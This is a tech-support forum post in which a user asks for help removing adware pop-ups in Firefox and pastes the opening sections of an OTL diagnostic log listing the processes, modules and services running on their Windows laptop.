Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

Can't delete Ads "Hot Deals" and "Recently Bought"

pub hot deals OTL report

  • Please log in to reply

#1
simbaman

simbaman

    New Member

  • Member
  • Pip
  • 2 posts
Hi expert !
 
I got pubs in Firefox Ads "Hot deals" by RightCoupon in right side and "Recently bought" on the bottom side in firefox.
I ran MBAM , adwcleaner ,spybot without success for these one.
 
I would appreciate if any one can help to analyse OTL reports attached Attached File  OTL.Txt   257.42KB   110 downloadsAttached File  Extras.Txt   104.75KB   148 downloads
Thanks for you help.
 
Regards

OTL logfile created on: 26/04/2014 17:28:34 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Janine.menage\Desktop
64bit- An unknown product (Version = 6.2.9200) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.16521)
Locale: 0000040C | Country: France | Language: FRA | Date Format: dd/MM/yyyy

3,89 Gb Total Physical Memory | 1,25 Gb Available Physical Memory | 32,08% Memory free
4,95 Gb Paging File | 2,08 Gb Available in Paging File | 42,02% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 279,11 Gb Total Space | 168,97 Gb Free Space | 60,54% Space Free | Partition Type: NTFS
Drive D: | 397,87 Gb Total Space | 226,80 Gb Free Space | 57,00% Space Free | Partition Type: NTFS

Computer Name: JANINE | User Name: Janine.menage | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2014/04/26 17:19:42 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Janine.menage\Desktop\OTL.exe
PRC - [2014/03/30 15:42:07 | 000,275,568 | ---- | M] (Mozilla Corporation) -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe
PRC - [2014/03/04 20:13:18 | 001,863,560 | ---- | M] (Adobe Systems, Inc.) -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_12_0_0_70.exe
PRC - [2014/01/21 04:56:25 | 002,234,144 | ---- | M] (NVIDIA Corporation) -- C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
PRC - [2014/01/21 04:55:50 | 001,593,632 | ---- | M] (NVIDIA Corporation) -- C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
PRC - [2013/12/29 23:08:49 | 000,390,616 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
PRC - [2013/12/29 23:08:35 | 000,169,432 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
PRC - [2013/12/21 08:04:16 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2013/11/21 09:31:44 | 000,287,592 | ---- | M] (Intel Corporation) -- C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
PRC - [2013/11/21 09:31:44 | 000,015,720 | ---- | M] (Intel Corporation) -- C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
PRC - [2013/11/12 13:08:21 | 003,898,360 | ---- | M] (Acronis) -- C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe
PRC - [2013/10/24 18:45:04 | 007,842,664 | ---- | M] (Acronis) -- C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe
PRC - [2013/10/22 21:30:48 | 007,151,024 | ---- | M] (Acronis) -- C:\Program Files (x86)\Common Files\Acronis\SyncAgent\syncagentsrv.exe
PRC - [2013/10/16 11:34:26 | 000,518,656 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\WWAHost.exe
PRC - [2013/10/15 13:27:38 | 003,921,880 | ---- | M] (Safer-Networking Ltd.) -- C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
PRC - [2013/10/10 13:41:36 | 001,104,320 | ---- | M] (Acronis International GmbH) -- C:\Program Files (x86)\Common Files\Acronis\TibMounter\TibMounterMonitor.exe
PRC - [2013/09/20 11:57:26 | 001,042,272 | ---- | M] (Safer-Networking Ltd.) -- C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
PRC - [2013/09/13 11:38:30 | 000,171,416 | ---- | M] (Safer-Networking Ltd.) -- C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
PRC - [2013/07/25 12:19:26 | 005,624,784 | ---- | M] (Safer-Networking Ltd.) -- C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
PRC - [2013/06/24 03:38:48 | 001,132,920 | ---- | M] (Motorola Solutions, Inc.) -- C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
PRC - [2013/04/29 17:03:18 | 000,277,120 | ---- | M] (ASUS) -- C:\Program Files\ASUS\P4G\InsOnSrv.exe
PRC - [2013/04/29 17:03:16 | 000,594,744 | ---- | M] (ASUS) -- C:\Program Files\ASUS\P4G\InsOnWMI.exe
PRC - [2013/04/23 15:50:46 | 001,153,400 | ---- | M] (Motorola Solutions, Inc.) -- C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
PRC - [2013/04/16 18:25:30 | 000,020,792 | ---- | M] (ASUSTeK Computer Inc.) -- C:\Program Files (x86)\ASUS\ASUS Smart Gesture\QuickGesture\x86\QuickGesture.exe
PRC - [2013/04/02 16:41:08 | 000,303,928 | ---- | M] (ASUSTek Computer Inc.) -- C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControl.exe
PRC - [2013/03/26 16:12:12 | 001,129,040 | ---- | M] (ASUSTek Computer Inc.) -- C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe
PRC - [2013/03/14 20:40:30 | 002,233,112 | ---- | M] (ASUSTek Computer Inc.) -- C:\Program Files\ASUS\ASUS VivoBook\vivokey.exe
PRC - [2013/02/26 12:08:24 | 000,176,240 | ---- | M] (ASUSTeK Computer Inc.) -- C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe
PRC - [2013/01/15 17:20:54 | 000,107,320 | ---- | M] (ASUSTek Computer Inc.) -- C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsLdrSrv.exe
PRC - [2013/01/11 16:57:24 | 000,328,504 | ---- | M] (ASUSTek Computer Inc.) -- C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe
PRC - [2012/11/28 18:56:40 | 000,054,488 | ---- | M] (ASUS) -- C:\Program Files (x86)\ASUS\Splendid\ACMON.exe
PRC - [2012/10/17 20:08:40 | 000,205,184 | ---- | M] (ASUSTek Computer Inc.) -- C:\Program Files (x86)\ASUS\ATK Package\ATK Media\DMedia.exe
PRC - [2012/05/28 11:04:48 | 000,113,312 | ---- | M] (ASUSTek Computer Inc.) -- C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\KBFiltr.exe
PRC - [2011/11/21 15:19:50 | 000,096,896 | ---- | M] (ASUS) -- C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe


========== Modules (No Company Name) ==========

MOD - [2014/03/30 15:42:00 | 003,642,480 | ---- | M] () -- C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
MOD - [2014/03/04 20:13:18 | 016,265,096 | ---- | M] () -- C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_12_0_0_70.dll
MOD - [2014/02/15 22:33:16 | 002,964,992 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\2155ee74acbc0781a44c2077ab3b95af\System.IdentityModel.ni.dll
MOD - [2014/02/15 22:32:35 | 000,785,408 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\805be8b7f84002fd634adf0a6cc01047\System.ServiceModel.Internals.ni.dll
MOD - [2014/02/15 22:32:35 | 000,118,272 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\c2f2c5073965c1d04b9023f65d3fe349\SMDiagnostics.ni.dll
MOD - [2014/02/15 22:26:51 | 007,803,392 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Xml\fd6afdb3a9309e9af89222b778f5901c\System.Xml.ni.dll
MOD - [2014/02/15 22:26:47 | 001,874,944 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Xaml\d16bc7f3c78f5da5e6cda39fe71f943c\System.Xaml.ni.dll
MOD - [2014/02/15 22:26:46 | 012,856,320 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\ec3e85d83522363e943a978c0572e360\System.Windows.Forms.ni.dll
MOD - [2014/02/15 22:26:35 | 019,566,080 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\31db5628e84268154f3bbeba0f7780df\System.ServiceModel.ni.dll
MOD - [2014/02/15 22:26:19 | 002,804,736 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\b110ef93e43ad2abdfa7b12c99443144\System.Runtime.Serialization.ni.dll
MOD - [2014/02/15 22:26:11 | 001,635,328 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Drawing\15ead42b8d352194f0f3fbba4f7ae02b\System.Drawing.ni.dll
MOD - [2014/02/15 22:26:04 | 000,968,192 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Configuration\9ab0202718d44c5bfe5120745304808a\System.Configuration.ni.dll
MOD - [2014/02/15 22:24:46 | 006,951,424 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Core\ab8978239d891c4afffd6a6df3996a6e\System.Core.ni.dll
MOD - [2014/02/15 22:24:37 | 010,003,456 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System\8455c031f8ffe82a0109c563873260e8\System.ni.dll
MOD - [2013/12/03 02:37:02 | 017,376,944 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\mscorlib\ebdd49343f711b2029293f8e621b28a2\mscorlib.ni.dll
MOD - [2013/11/23 21:26:48 | 000,013,088 | ---- | M] () -- C:\Program Files (x86)\NVIDIA Corporation\coprocmanager\detoured.dll
MOD - [2013/10/24 18:06:16 | 000,028,992 | ---- | M] () -- C:\Program Files (x86)\Common Files\Acronis\Home\thread_pool.dll
MOD - [2013/10/24 18:06:10 | 000,036,672 | ---- | M] () -- C:\Program Files (x86)\Acronis\TrueImageHome\qt_icontray_ex.dll
MOD - [2013/10/10 13:02:34 | 000,013,120 | ---- | M] () -- C:\Program Files (x86)\Common Files\Acronis\TibMounter\icudt38.dll
MOD - [2013/05/16 11:55:26 | 000,113,496 | ---- | M] () -- C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
MOD - [2013/05/16 11:55:24 | 000,416,600 | ---- | M] () -- C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl


========== Services (SafeList) ==========

SRV:64bit: - [2014/03/30 03:43:28 | 002,211,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe -- (ClickToRunSvc)
SRV:64bit: - [2014/03/17 18:54:26 | 000,185,792 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Windows\SysNative\mfevtps.exe -- (mfevtp)
SRV:64bit: - [2014/03/17 18:47:02 | 000,219,752 | ---- | M] () [Auto | Running] -- C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe -- (mfefire)
SRV:64bit: - [2014/02/06 12:48:45 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2014/01/28 01:14:46 | 000,178,528 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\McAfee\MSC\McAPExe.exe -- (McAPExe)
SRV:64bit: - [2014/01/21 05:04:28 | 001,025,712 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe -- (mfecore)
SRV:64bit: - [2014/01/21 04:55:35 | 016,939,296 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe -- (NvStreamSvc)
SRV:64bit: - [2013/11/27 17:36:30 | 003,395,920 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\WSService.dll -- (WSService)
SRV:64bit: - [2013/11/27 11:17:40 | 000,263,168 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\bisrv.dll -- (BrokerInfrastructure)
SRV:64bit: - [2013/11/23 06:50:00 | 000,282,112 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\SystemEventsBrokerServer.dll -- (SystemEventsBroker)
SRV:64bit: - [2013/11/21 09:31:44 | 000,015,720 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe -- (IAStorDataMgrSvc)
SRV:64bit: - [2013/11/20 19:00:20 | 003,674,864 | ---- | M] (Intel® Corporation) [Auto | Running] -- C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe -- (ZeroConfigService)
SRV:64bit: - [2013/11/20 18:59:58 | 000,284,912 | ---- | M] () [On_Demand | Stopped] -- C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe -- (MyWiFiDHCPDNS)
SRV:64bit: - [2013/11/20 18:59:38 | 000,631,024 | ---- | M] (Intel® Corporation) [Auto | Running] -- C:\Program Files\Intel\WiFi\bin\EvtEng.exe -- (EvtEng)
SRV:64bit: - [2013/11/20 18:58:50 | 000,154,864 | ---- | M] (Intel® Corporation) [Auto | Running] -- C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe -- (RegSrvc)
SRV:64bit: - [2013/11/08 05:41:17 | 001,302,528 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppXDeploymentServer.dll -- (AppXSvc)
SRV:64bit: - [2013/10/31 02:29:53 | 000,348,392 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\NisSrv.exe -- (WdNisSvc)
SRV:64bit: - [2013/10/31 02:29:53 | 000,023,824 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)
SRV:64bit: - [2013/10/25 19:08:12 | 002,768,208 | ---- | M] (CybelSoft) [Auto | Running] -- C:\Program Files\ma-config.com\MaConfigAgent.exe -- (MaConfigAgent)
SRV:64bit: - [2013/10/22 03:53:47 | 001,584,128 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\workfolderssvc.dll -- (workfolderssvc)
SRV:64bit: - [2013/10/04 10:10:59 | 000,533,504 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppReadiness.dll -- (AppReadiness)
SRV:64bit: - [2013/09/30 06:14:00 | 001,555,456 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wlidsvc.dll -- (wlidsvc)
SRV:64bit: - [2013/09/30 06:14:00 | 000,365,568 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wcmsvc.dll -- (Wcmsvc)
SRV:64bit: - [2013/09/30 06:13:59 | 000,491,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\GeofenceMonitorService.dll -- (lfsvc)
SRV:64bit: - [2013/08/27 15:32:30 | 000,828,376 | ---- | M] (Intel® Corporation) [On_Demand | Stopped] -- C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe -- (Intel®
SRV:64bit: - [2013/08/27 15:32:14 | 000,747,520 | ---- | M] (Intel® Corporation) [Auto | Running] -- C:\Program Files\Intel\iCLS Client\HeciServer.exe -- (Intel®
SRV:64bit: - [2013/08/22 14:31:56 | 002,899,968 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV:64bit: - [2013/08/22 13:32:02 | 000,024,576 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wephostsvc.dll -- (WEPHOSTSVC)
SRV:64bit: - [2013/08/22 13:31:43 | 000,040,448 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\efssvc.dll -- (EFS)
SRV:64bit: - [2013/08/22 13:22:45 | 000,066,048 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wiarpc.dll -- (WiaRpc)
SRV:64bit: - [2013/08/22 13:21:15 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\svsvc.dll -- (svsvc)
SRV:64bit: - [2013/08/22 13:16:57 | 000,118,272 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\fhsvc.dll -- (fhsvc)
SRV:64bit: - [2013/08/22 12:25:28 | 000,164,352 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcaSvc.dll -- (NcaSvc)
SRV:64bit: - [2013/08/22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicvss)
SRV:64bit: - [2013/08/22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmictimesync)
SRV:64bit: - [2013/08/22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicshutdown)
SRV:64bit: - [2013/08/22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicrdv)
SRV:64bit: - [2013/08/22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmickvpexchange)
SRV:64bit: - [2013/08/22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicheartbeat)
SRV:64bit: - [2013/08/22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicguestinterface)
SRV:64bit: - [2013/08/22 12:04:53 | 000,716,288 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsm.dll -- (LSM)
SRV:64bit: - [2013/08/22 12:02:47 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\smphost.dll -- (smphost)
SRV:64bit: - [2013/08/22 11:59:26 | 000,832,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netlogon.dll -- (Netlogon)
SRV:64bit: - [2013/08/22 11:57:25 | 000,130,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ScDeviceEnum.dll -- (ScDeviceEnum)
SRV:64bit: - [2013/08/22 11:54:59 | 000,059,392 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)
SRV:64bit: - [2013/08/22 11:50:59 | 000,245,760 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\TimeBrokerServer.dll -- (TimeBroker)
SRV:64bit: - [2013/08/22 11:50:00 | 000,525,312 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)
SRV:64bit: - [2013/08/22 11:45:59 | 000,151,040 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\ncbservice.dll -- (NcbService)
SRV:64bit: - [2013/08/22 11:40:49 | 000,248,832 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\vaultsvc.dll -- (VaultSvc)
SRV:64bit: - [2013/08/22 11:40:14 | 000,398,848 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\das.dll -- (DeviceAssociationService)
SRV:64bit: - [2013/08/22 11:39:33 | 000,198,656 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)
SRV:64bit: - [2013/08/22 11:31:03 | 000,201,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\DeviceSetupManager.dll -- (DsmSvc)
SRV:64bit: - [2013/08/22 11:15:54 | 000,073,728 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\NcdAutoSetup.dll -- (NcdAutoSetup)
SRV:64bit: - [2013/08/02 18:52:58 | 000,602,944 | ---- | M] (McAfee, Inc.) [On_Demand | Stopped] -- C:\Program Files\mcafee\VirusScan\mcods.exe -- (McODS)
SRV:64bit: - [2013/07/30 12:45:02 | 000,328,928 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe -- (MSK80Service)
SRV:64bit: - [2013/07/30 12:45:02 | 000,328,928 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe -- (McProxy)
SRV:64bit: - [2013/07/30 12:45:02 | 000,328,928 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe -- (mcpltsvc)
SRV:64bit: - [2013/07/30 12:45:02 | 000,328,928 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe -- (McNaiAnn)
SRV:64bit: - [2013/07/30 12:45:02 | 000,328,928 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe -- (McMPFSvc)
SRV:64bit: - [2013/07/30 12:45:02 | 000,328,928 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe -- (McAfee SiteAdvisor Service)
SRV:64bit: - [2013/07/30 12:45:02 | 000,328,928 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe -- (HomeNetSvc)
SRV:64bit: - [2013/07/29 05:01:08 | 000,772,064 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe -- (AMPPALR3)
SRV:64bit: - [2013/04/29 17:03:18 | 000,277,120 | ---- | M] (ASUS) [Auto | Running] -- C:\Program Files\ASUS\P4G\InsOnSrv.exe -- (ASUS InstantOn)
SRV:64bit: - [2013/04/22 04:13:32 | 000,092,864 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Windows\SysNative\DptfPolicyLpmService.exe -- (DptfPolicyLpmService)
SRV:64bit: - [2013/04/22 04:13:32 | 000,084,568 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Windows\SysNative\DptfPolicyCriticalService.exe -- (DptfPolicyCriticalService)
SRV:64bit: - [2013/04/22 04:13:30 | 000,100,032 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Windows\SysNative\DptfPolicyConfigTDPService.exe -- (DptfPolicyConfigTDPService)
SRV:64bit: - [2013/04/22 04:13:30 | 000,083,032 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Windows\SysNative\DptfParticipantProcessorService.exe -- (DptfParticipantProcessorService)
SRV:64bit: - [2013/04/16 19:09:00 | 000,101,536 | ---- | M] (Intel) [Auto | Running] -- C:\Program Files\Intel Corporation\Intel WiDi\BrcmSetSecurity.exe -- (BrcmSetSecurity)
SRV:64bit: - [2013/04/15 16:45:08 | 000,182,760 | ---- | M] () [Auto | Running] -- C:\Program Files\Intel\Intel® Smart Connect Technology Agent\iSCTAgent.exe -- (ISCTAgent)
SRV:64bit: - [2013/02/13 01:36:28 | 000,163,840 | ---- | M] (Brio) [Auto | Running] -- C:\Program Files\FolderSize\FolderSizeSvc.exe -- (FolderSize)
SRV:64bit: - [2013/01/08 09:03:24 | 000,107,944 | ---- | M] (Condusiv Technologies) [Auto | Running] -- C:\Program Files\Condusiv Technologies\ExpressCache\ExpressCache.exe -- (ExpressCache)
SRV:64bit: - [2012/09/12 19:07:06 | 000,135,984 | ---- | M] (Intel® Corporation) [Auto | Running] -- C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe -- (BTHSSecurityMgr)
SRV:64bit: - [2012/03/22 22:11:28 | 000,825,032 | ---- | M] (Cambridge Silicon Radio Limited) [Auto | Running] -- C:\Program Files\CSR\CSR Harmony Wireless Software Stack\CsrBtService.exe -- (CsrBtService)
SRV:64bit: - [2012/03/22 22:11:16 | 001,041,616 | ---- | M] (Cambridge Silicon Radio Limited) [Auto | Running] -- C:\Program Files\CSR\CSR Harmony Wireless Software Stack\CsrBtOBEXService.exe -- (CsrBtOBEXService)
SRV:64bit: - [2012/03/22 22:11:08 | 000,465,624 | ---- | M] (Cambridge Silicon Radio Limited) [Auto | Running] -- C:\Program Files\CSR\CSR Harmony Wireless Software Stack\CsrBtAudioService.exe -- (CSRBtAudioService)
SRV:64bit: - [2012/03/22 22:11:00 | 000,064,216 | ---- | M] (Cambridge Silicon Radio Limited) [Auto | Running] -- C:\Program Files\CSR\CSR Harmony Wireless Software Stack\BtSwitcherService.exe -- (BtSwitcherService)
SRV - [2014/03/30 15:42:06 | 000,119,408 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014/01/21 04:55:50 | 001,593,632 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe -- (NvNetworkService)
SRV - [2013/12/29 23:08:49 | 000,390,616 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2013/12/29 23:08:35 | 000,169,432 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe -- (jhi_service)
SRV - [2013/12/21 08:04:16 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2013/11/12 13:08:21 | 003,898,360 | ---- | M] (Acronis) [Auto | Running] -- C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe -- (afcdpsrv)
SRV - [2013/10/22 21:30:48 | 007,151,024 | ---- | M] (Acronis) [Auto | Running] -- C:\Program Files (x86)\Common Files\Acronis\SyncAgent\syncagentsrv.exe -- (syncagentsrv)
SRV - [2013/10/01 13:02:42 | 000,279,000 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)
SRV - [2013/09/30 06:13:57 | 000,357,376 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\GeofenceMonitorService.dll -- (lfsvc)
SRV - [2013/08/22 14:31:56 | 002,899,968 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\system32\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV - [2013/08/22 05:55:35 | 000,018,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\StorSvc.dll -- (StorSvc)
SRV - [2013/08/22 04:53:34 | 000,011,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\smphost.dll -- (smphost)
SRV - [2013/07/18 12:52:08 | 001,143,368 | ---- | M] (Acronis) [Auto | Running] -- C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedul2.exe -- (AcrSch2Svc)
SRV - [2013/06/26 11:49:12 | 000,156,616 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Bluetooth\ibtrksrv.exe -- (Intel®
SRV - [2013/06/24 03:38:48 | 001,132,920 | ---- | M] (Motorola Solutions, Inc.) [Auto | Running] -- C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe -- (Bluetooth Device Monitor)
SRV - [2013/04/23 15:50:46 | 001,153,400 | ---- | M] (Motorola Solutions, Inc.) [Auto | Running] -- C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe -- (Bluetooth OBEX Service)
